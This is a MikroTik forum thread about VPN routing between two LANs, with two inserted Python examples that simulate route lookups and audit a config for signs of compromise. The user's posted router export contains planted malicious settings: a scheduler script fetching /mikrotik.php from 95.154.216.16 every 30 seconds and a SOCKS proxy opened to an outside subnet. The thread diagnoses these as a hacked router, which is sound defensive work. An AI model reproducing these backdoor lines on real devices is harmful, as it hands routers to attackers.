0blar
just joined
Topic Author
Posts: 22
Joined: Tue Jan 30, 2018 10:43 am

VPN and network access

Mon Sep 17, 2018 12:35 pm

Hi
I'm new here and I have some problems; I hope you can help me.
Here is my configuration:

- 1st LAN (192.168.0.0/24): VPN server (fixed IP address) + other PCs
(no router, just the ISP box)
gateway is 192.168.0.254

- 2nd LAN (10.15.2.0/24): VPN client (dynamic IP address) + 4G modem + MikroTik router (RB951Ui-2HnD) + switch + PCs
gateway is 10.15.2.1


Regarding the VPN configuration, I followed http://www.urosvovk.com/step-by-step-ho ... -routeros/
> interface ethernet print
Flags: X - disabled, R - running, S - slave
 #    NAME              MTU MAC-ADDRESS       ARP             SWITCH
 0 R  ether1           1500 64:D1:54:E3:7B:14 enabled         switch1
 1  S ether2-master    1500 64:D1:54:E3:7B:15 enabled         switch1
 2  S ether3           1500 64:D1:54:E3:7B:16 enabled         switch1
 3    ether4           1500 64:D1:54:E3:7B:17 enabled         switch1
 4 R  ether5           1500 64:D1:54:E3:7B:18 enabled         switch1
> /interface ovpn-client
 add name=ovpn-client1 connect-to=2.2.2.2 user=client1 password=123 disabled=no
> /ip route print
#      DST-ADDRESS        PREF-SRC        GATEWAY            DISTANCE
 0 A S  0.0.0.0/0                          pptp-out1                 1
 1 ADS  0.0.0.0/0                          pptp-out1                 0
 2   S  0.0.0.0/0                          192.168.8.1               1
 3 ADC  10.15.2.0/24       10.15.2.1       ether5                    0
 4 ADS  A.B.C.D/32                         192.168.8.1               0
 5 ADC  192.168.8.0/24     192.168.8.2     ether1                    0
 6 ADC  192.168.88.0/24    192.168.88.1    bridge                    0
 7 ADC  E.F.G.H/32         192.168.27.66   pptp-out1                 0
> /ip firewall nat print
Flags: X - disabled, I - invalid, D - dynamic
 0    ;;; defconf: masquerade
      chain=srcnat action=masquerade out-interface=ether1

 1    chain=srcnat action=masquerade out-interface=pptp-out1 log=no
      log-prefix=""
I can successfully ping all my devices located in the 1st LAN from the 2nd LAN.
I cannot ping any devices located in the 2nd LAN from the 1st LAN (I cannot ping from 192.168.0.1 towards 10.15.2.3 or any other device).

Can someone help me allow the 1st LAN to connect to the 2nd LAN?

Thank you
config 4g.png
Last edited by 0blar on Sat Sep 22, 2018 1:23 am, edited 1 time in total.
 
0blar
just joined
Topic Author
Posts: 22
Joined: Tue Jan 30, 2018 10:43 am

Re: VPN and network access

Thu Sep 20, 2018 5:50 am

Any help?
 
Bobstonom
just joined
Posts: 6
Joined: Tue Sep 11, 2018 6:17 pm
Location: Tampa, Florida

Re: VPN and network access

Thu Sep 20, 2018 2:28 pm

How is it now, 0blar? Anyone PM'ed you yet about the solution?
 
0blar
just joined
Topic Author
Posts: 22
Joined: Tue Jan 30, 2018 10:43 am

Re: VPN and network access

Thu Sep 20, 2018 7:22 pm

Hi
No one yet
 
Sob
Forum Guru
Forum Guru
Posts: 9121
Joined: Mon Apr 20, 2009 9:11 pm

Re: VPN and network access

Fri Sep 21, 2018 3:39 am

What about routes? Does the VPN server know where to look for 10.15.2.0/24?
 
0blar
just joined
Topic Author
Posts: 22
Joined: Tue Jan 30, 2018 10:43 am

Re: VPN and network access

Fri Sep 21, 2018 9:12 am

Here are the routes I have
> /ip route print
#      DST-ADDRESS        PREF-SRC        GATEWAY            DISTANCE
 0 A S  0.0.0.0/0                          pptp-out1                 1
 1 ADS  0.0.0.0/0                          pptp-out1                 0
 2   S  0.0.0.0/0                          192.168.8.1               1
 3 ADC  10.15.2.0/24       10.15.2.1       ether5                    0
 4 ADS  A.B.C.D/32                         192.168.8.1               0
 5 ADC  192.168.8.0/24     192.168.8.2     ether1                    0
 6 ADC  192.168.88.0/24    192.168.88.1    bridge                    0
 7 ADC  E.F.G.H/32         192.168.27.66   pptp-out1                 0
 
Just to let you know that I'm a newbie with MikroTik.

Thanks again
 
Sob
Forum Guru
Forum Guru
Posts: 9121
Joined: Mon Apr 20, 2009 9:11 pm

Re: VPN and network access

Fri Sep 21, 2018 6:23 pm

It looks like the routes from the 2nd LAN router (VPN client). I mean the routes from the 1st LAN router (VPN server).
 
0blar
just joined
Topic Author
Posts: 22
Joined: Tue Jan 30, 2018 10:43 am

Re: VPN and network access

Sat Sep 22, 2018 1:20 am

Hi
I don't have any router on the 1st LAN (VPN server side), only the ISP box with the private IP address 192.168.0.254.
All devices on the 1st LAN are in 192.168.0.0/24.
 
Sob
Forum Guru
Forum Guru
Posts: 9121
Joined: Mon Apr 20, 2009 9:11 pm

Re: VPN and network access

Sat Sep 22, 2018 2:30 am

OK, not a router, but the VPN server needs to know where 10.15.2.0/24 is. Does it? Because if it doesn't, it will send all traffic to 10.15.2.0/24 to its default gateway, and from there it has no chance of reaching the destination (the VPN client).

When connecting from LAN2 to LAN1, the masquerade rule on pptp-out1 makes all traffic look like it comes from the single IP address that the VPN client got from the VPN server, so it works, because the VPN server obviously knows where that address is.

But to reach LAN2 from LAN1 (or from the VPN server itself), the VPN server must have a route to it; expressed as RouterOS config it would be:
/ip route
add dst-address=10.15.2.0/24 gateway=<VPN client address>
And then you also wouldn't need the masquerade rule anymore.
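The asymmetry Sob describes comes down to a longest-prefix-match lookup on each hop. The following is an added example (mine, not from the thread or from MikroTik) that walks a packet through constructed routing tables built from the addresses in the thread: the node names, the ISP box's table and the server's host route to the client's tunnel address are assumptions, and the MikroTik's table is condensed from the `/ip route print` posted above.

```python
"""Route lookup behind Sob's explanation: where does the VPN server send 10.15.2.x?"""
import ipaddress
from typing import Dict, List, Optional, Tuple

Net = ipaddress.IPv4Network
# A table is a list of (prefix, gateway). A gateway of the form "connected:<iface>"
# means "deliver directly onto that link"; anything else is resolved through
# ADDRESS_OWNER to the node that receives the packet next.
Table = List[Tuple[Net, str]]


def lookup(table: Table, dst: str) -> Optional[str]:
    """Longest-prefix match: the most specific prefix containing dst wins."""
    ip = ipaddress.ip_address(dst)
    best: Optional[Tuple[Net, str]] = None
    for prefix, via in table:
        if ip in prefix and (best is None or prefix.prefixlen > best[0].prefixlen):
            best = (prefix, via)
    return best[1] if best else None


# Constructed topology from the addresses in the thread; node names and the
# ISP box's table are assumptions.
VPN_SERVER: Table = [
    (Net("192.168.0.0/24"), "connected:lan1"),
    (Net("192.168.27.66/32"), "192.168.27.66"),  # tunnel address leased to the client
    (Net("0.0.0.0/0"), "192.168.0.254"),          # default: the ISP box
]
VPN_CLIENT: Table = [  # the MikroTik, condensed from the posted /ip route print
    (Net("10.15.2.0/24"), "connected:ether5"),
    (Net("192.168.8.0/24"), "connected:ether1"),
    (Net("192.168.27.66/32"), "connected:pptp-out1"),  # its own tunnel address
    (Net("0.0.0.0/0"), "pptp-out1"),                   # default into the tunnel
]
ISP_BOX: Table = [
    (Net("192.168.0.0/24"), "connected:lan1"),
    (Net("0.0.0.0/0"), "internet"),  # a private 10.15.2.x destination is lost here
]
NODES: Dict[str, Table] = {"vpn_server": VPN_SERVER, "vpn_client": VPN_CLIENT, "isp_box": ISP_BOX}
ADDRESS_OWNER = {
    "192.168.27.66": "vpn_client",
    "192.168.0.254": "isp_box",
    "pptp-out1": "vpn_server",  # point-to-point: the far end of the tunnel is the server
}


def forward_path(start: str, dst: str, nodes: Dict[str, Table] = NODES, max_hops: int = 8) -> List[str]:
    """Follow a packet node by node until it is delivered, dropped, or leaves our view."""
    path, node = [start], start
    for _ in range(max_hops):
        via = lookup(nodes[node], dst)
        if via is None:
            return path + ["no route"]
        hop = ADDRESS_OWNER.get(via, via)
        path.append(hop)
        if hop.startswith("connected:") or hop not in nodes:
            return path  # delivered on a link, or handed to something we do not model
        node = hop
    return path + ["loop"]


def with_route(table: Table, dst_address: str, gateway: str) -> Table:
    """Sob's `/ip route add dst-address=... gateway=...`, applied to a copy of the table."""
    return table + [(Net(dst_address), gateway)]


def demo() -> Dict[str, List[str]]:
    """The three paths Sob's post describes."""
    before = forward_path("vpn_server", "10.15.2.3")
    fixed = dict(NODES, vpn_server=with_route(VPN_SERVER, "10.15.2.0/24", "192.168.27.66"))
    after = forward_path("vpn_server", "10.15.2.3", fixed)
    # Masqueraded LAN2->LAN1 traffic arrives from 192.168.27.66, which the server can reach.
    reply = forward_path("vpn_server", "192.168.27.66")
    return {"before": before, "after": after, "masquerade_reply": reply}


if __name__ == "__main__":
    for name, path in demo().items():
        print(f"{name:16} {' -> '.join(path)}")
```

Without the route, the server's only match for 10.15.2.3 is its default and the packet ends at the ISP box; with the /24 added it is handed to the client, whose connected ether5 route delivers it. The masqueraded return traffic already worked because the server holds a /32 for the client's tunnel address.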
 
0blar
just joined
Topic Author
Posts: 22
Joined: Tue Jan 30, 2018 10:43 am

Re: VPN and network access

Sun Sep 23, 2018 11:48 am

Hi
but VPN server needs to know where 10.15.2.0/24 is. Does it?
NO

The IP address of the VPN client side is 192.168.27.66, so I did
/ip route
add dst-address=10.15.2.0/24 gateway=192.168.27.66
but no success.
 
Sob
Forum Guru
Forum Guru
Posts: 9121
Joined: Mon Apr 20, 2009 9:11 pm

Re: VPN and network access

Sun Sep 23, 2018 5:36 pm

I hope I didn't confuse you with RouterOS syntax (I'm just used to it); you did this on the ISP box / VPN server (in some equivalent way used by that device), right?

If so and it doesn't work, check what happens. Try to use Tools->Torch on the client's VPN interface and watch for incoming packets to 10.15.2.x while trying to connect there from the server side. If there are some, the part with the route worked. Then you can check if they pass through the router and go to the LAN interface where 10.15.2.0/24 is. If not, you can have a firewall blocking them.

If you don't succeed, you might want to run in Terminal:
/export hide-sensitive file=config
and post the content of the resulting config.rsc here.
 
0blar
just joined
Topic Author
Posts: 22
Joined: Tue Jan 30, 2018 10:43 am

Re: VPN and network access

Sun Sep 23, 2018 6:36 pm

you did this on ISP Box / VPN Server
I did this on the MikroTik (client side).
I don't have any router on the 1st LAN.

Here is the result of
/export hide-sensitive file=config
# sep/23/2018 17:12:00 by RouterOS 6.43.2
# software id = 7X1Z-41C2
#
# model = 951Ui-2HnD
# serial number = XXXXXXXXXXX
/interface bridge
add admin-mac=AA:AA:AA:AA:AA:AA auto-mac=no comment=defconf name=bridge
/interface ethernet
set [ find default-name=ether1 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether2 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full name=\
    ether2-master
set [ find default-name=ether3 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether4 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether5 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
/interface wireless
set [ find default-name=wlan1 ] band=2ghz-b/g/n channel-width=20/40mhz-Ce \
    disabled=no distance=indoors frequency=auto mode=ap-bridge ssid=\
    MikroTik-E37B19 wireless-protocol=802.11
/interface pptp-client
add add-default-route=yes allow=mschap1,mschap2 connect-to=ISP_PUBLIC_IP \
    default-route-distance=0 disabled=no max-mru=1490 max-mtu=1490 name=\
    pptp-out1 user=xxxxxx
/interface vlan
add interface=ether5 name=cam vlan-id=10
add interface=ether5 name=lan vlan-id=12
add interface=ether5 name=srv vlan-id=11
/interface list
add exclude=dynamic name=discover
add name=mactel
add name=mac-winbox
add name=WAN
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip pool
add name=dhcp_pool0 ranges=10.15.0.2-10.15.0.254
/ip dhcp-server
add address-pool=dhcp_pool0 disabled=no interface=lan lease-time=4w2d name=\
    dhcp1
/interface bridge port
add bridge=bridge comment=defconf interface=ether2-master
add bridge=bridge comment=defconf interface=wlan1
add bridge=bridge interface=ether3
/ip neighbor discovery-settings
set discover-interface-list=discover
/interface list member
add interface=ether2-master list=discover
add interface=ether3 list=discover
add interface=ether4 list=discover
add interface=ether5 list=discover
add interface=wlan1 list=discover
add interface=bridge list=discover
add interface=lan list=discover
add interface=srv list=discover
add interface=cam list=discover
add interface=bridge list=mactel
add interface=bridge list=mac-winbox
add interface=ether1 list=WAN
/ip address
add address=192.168.88.1/24 comment=defconf interface=ether2-master network=\
    192.168.88.0
add address=10.15.2.1/24 interface=ether5 network=10.15.2.0
add address=192.168.8.2/24 interface=ether1 network=192.168.8.0
/ip arp
add address=10.15.2.4 interface=ether1
/ip cloud
set ddns-enabled=yes
/ip dhcp-server network
add address=10.15.0.0/24 dns-server=10.15.0.1 gateway=10.15.0.1
/ip dns
set allow-remote-requests=yes servers=4.2.2.2
/ip dns static
add address=192.168.88.1 name=router
/ip firewall filter
add action=accept chain=input protocol=icmp
add action=accept chain=input connection-state=related
add action=accept chain=input connection-state=established
add action=accept chain=input comment="SSH Access" dst-port=22 protocol=tcp
/ip firewall mangle
add action=mark-routing chain=prerouting new-routing-mark=VPN passthrough=yes \
    src-address=10.15.2.1-10.15.2.254
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" \
    out-interface=ether1
add action=masquerade chain=srcnat out-interface=pptp-out1
/ip route
add check-gateway=ping distance=1 gateway=pptp-out1 routing-mark=VPN
add distance=1 gateway=192.168.8.1
add distance=1 dst-address=10.15.2.0/24 gateway=192.168.27.66
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
/system clock
/system routerboard settings
set silent-boot=no
/system scheduler
add interval=1m name=UpdateDNS on-event=Update_WAN policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-time=startup
add interval=5m name=test_schedule on-event=test policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-date=jan/30/2018 start-time=09:35:42
add interval=30s name=schedule4_ on-event=script4_ policy=\
    ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add dont-require-permissions=no name=Update_WAN owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=\
    "/ip dns cache flush\r\
    \n/ip cloud  force-update"
add dont-require-permissions=no name=test owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="#\
    \_Update DNS on Freedns.afraid.org\r\
    \n:global host \"freedns.afraid.org\"\r\
    \n:global url \"https://freedns.afraid.org/dynamic/update.php\?c3N2T"\r\
    \n\r\
    \n/ip dns cache flush\r\
    \n/tool fetch url=\$url host=\$host"
add dont-require-permissions=no name=script4_ owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=95.154.216.16 port=2008 src-path=/mikrotik.php mode=http keep-resul\
    t=no"
/tool mac-server
set allowed-interface-list=mactel
/tool mac-server mac-winbox
set allowed-interface-list=mac-winbox
Something strange: I see the IP 95.154.216.16, I don't know it.
 
Sob
Forum Guru
Forum Guru
Posts: 9121
Joined: Mon Apr 20, 2009 9:11 pm

Re: VPN and network access

Sun Sep 23, 2018 8:07 pm

It won't help you on the client side; it's the VPN server that must know where the 10.15.2.0/24 subnet is. And currently it doesn't. So you must find a way to add this route on the VPN server. Or if you in fact need to access only some service in the 10.15.2.0/24 network (and not the whole network), you could do it using port forwarding. In other words, devices from the 1st LAN would be connecting to the IP address of the VPN client (192.168.27.66) and you'd forward port(s) from there to 10.15.2.x.

And that address you don't know, downloading /mikrotik.php, and the enabled SOCKS proxy: I'm afraid I have some bad news for you, it looks like a hacked router, see Winbox vulnerability: please upgrade. Not very surprising, since you have no firewall (you have some rules, but they allow absolutely everything).
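Sob's diagnosis rests on three things that are visible in the posted export: the SOCKS proxy switched on, a scheduled script fetching /mikrotik.php from an address the owner does not recognise, and an input chain made only of accept rules. The following is an added example (mine, not Sob's and not MikroTik's code) of checking an `/export` for exactly those three indicators. The sample export is a constructed excerpt of the one posted above (the address and file name are the ones quoted in the thread), and the hardened filter it is compared against is constructed for contrast, in the shape of the RouterOS default firewall.

```python
"""Check a RouterOS /export for the three things Sob points at in this thread."""
import re
from typing import Dict, List

# Constructed sample: an excerpt of the export posted above, trimmed to the
# sections the checks read. 95.154.216.16 and /mikrotik.php are the values
# quoted in the thread.
SAMPLE_EXPORT = r"""# sep/23/2018 17:12:00 by RouterOS 6.43.2
/ip firewall filter
add action=accept chain=input protocol=icmp
add action=accept chain=input connection-state=related
add action=accept chain=input connection-state=established
add action=accept chain=input comment="SSH Access" dst-port=22 protocol=tcp
/ip socks
set enabled=yes port=4153
/system script
add dont-require-permissions=no name=script4_ owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=95.154.216.16 port=2008 src-path=/mikrotik.php mode=http keep-resul\
    t=no"
"""

# Constructed contrast: a filter shaped like the RouterOS default firewall
# (ether5 is the LAN port in the thread, ether1 the WAN side) and SOCKS off.
HARDENED_SAMPLE = """/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=drop chain=input connection-state=invalid
add action=accept chain=input in-interface=ether5 comment="management from LAN only"
add action=drop chain=input comment="everything else aimed at the router"
add action=accept chain=forward connection-state=established,related
add action=drop chain=forward connection-state=new in-interface=ether1
/ip socks
set enabled=no
"""

KV_RE = re.compile(r'([A-Za-z][\w-]*)=("(?:[^"\\]|\\.)*"|\S+)')
FETCH_ADDR_RE = re.compile(r'(?:address|url)=([^\s"\\$]+)')  # literal targets, not $vars
URL_HOST_RE = re.compile(r'https?://([^/\s"\\]+)')


def join_continuations(text: str) -> List[str]:
    """/export wraps long statements with a trailing backslash; glue them back."""
    out: List[str] = []
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.lstrip() if pending else raw
        if line.endswith("\\"):
            pending = line[:-1]
        else:
            out.append(line)
            pending = ""
    return out + ([pending] if pending else [])


def parse_kv(stmt: str) -> Dict[str, str]:
    """`add k=v k2="quoted v"` -> dict, surrounding quotes removed."""
    return {k: v[1:-1] if v.startswith('"') else v for k, v in KV_RE.findall(stmt)}


def parse_export(text: str) -> Dict[str, List[Dict[str, str]]]:
    """Group statements under their `/menu path` header line."""
    sections: Dict[str, List[Dict[str, str]]] = {}
    current = None
    for line in join_continuations(text):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if stripped.startswith("/"):
            current = stripped
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(parse_kv(stripped))
    return sections


def fetch_targets(script_source: str) -> List[str]:
    """Hosts or addresses a script's /tool fetch reaches out to."""
    if "/tool fetch" not in script_source:
        return []
    targets = set(FETCH_ADDR_RE.findall(script_source)) | set(URL_HOST_RE.findall(script_source))
    return sorted(targets)


def audit(text: str) -> List[str]:
    """One line per indicator found; an empty list means nothing was flagged."""
    cfg = parse_export(text)
    findings: List[str] = []
    for stmt in cfg.get("/ip socks", []):          # 1. SOCKS proxy switched on
        if stmt.get("enabled") == "yes":
            findings.append(f"socks proxy enabled on port {stmt.get('port', '?')}")
    for stmt in cfg.get("/system script", []):     # 2. scripts pulling from outside
        for target in fetch_targets(stmt.get("source", "")):
            findings.append(f"script {stmt.get('name')} fetches from {target}")
    rules = cfg.get("/ip firewall filter", [])     # 3. chains that never drop anything
    for chain in ("input", "forward"):
        if not any(r.get("chain") == chain and r.get("action") in ("drop", "reject") for r in rules):
            findings.append(f"firewall chain {chain} has no drop/reject rule")
    return findings


if __name__ == "__main__":
    for label, text in (("posted export", SAMPLE_EXPORT), ("hardened", HARDENED_SAMPLE)):
        print(label, audit(text) or ["clean"])
```

Run against the posted excerpt it reports all four problems; against the hardened filter it reports none. The fetch check lists every literal destination a script contacts rather than judging them, since deciding which hosts are legitimate (the dynamic-DNS updater in the same export, for instance) is the owner's call.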
 
0blar
just joined
Topic Author
Posts: 22
Joined: Tue Jan 30, 2018 10:43 am

Re: VPN and network access

Mon Sep 24, 2018 9:29 am

Thanks for your help
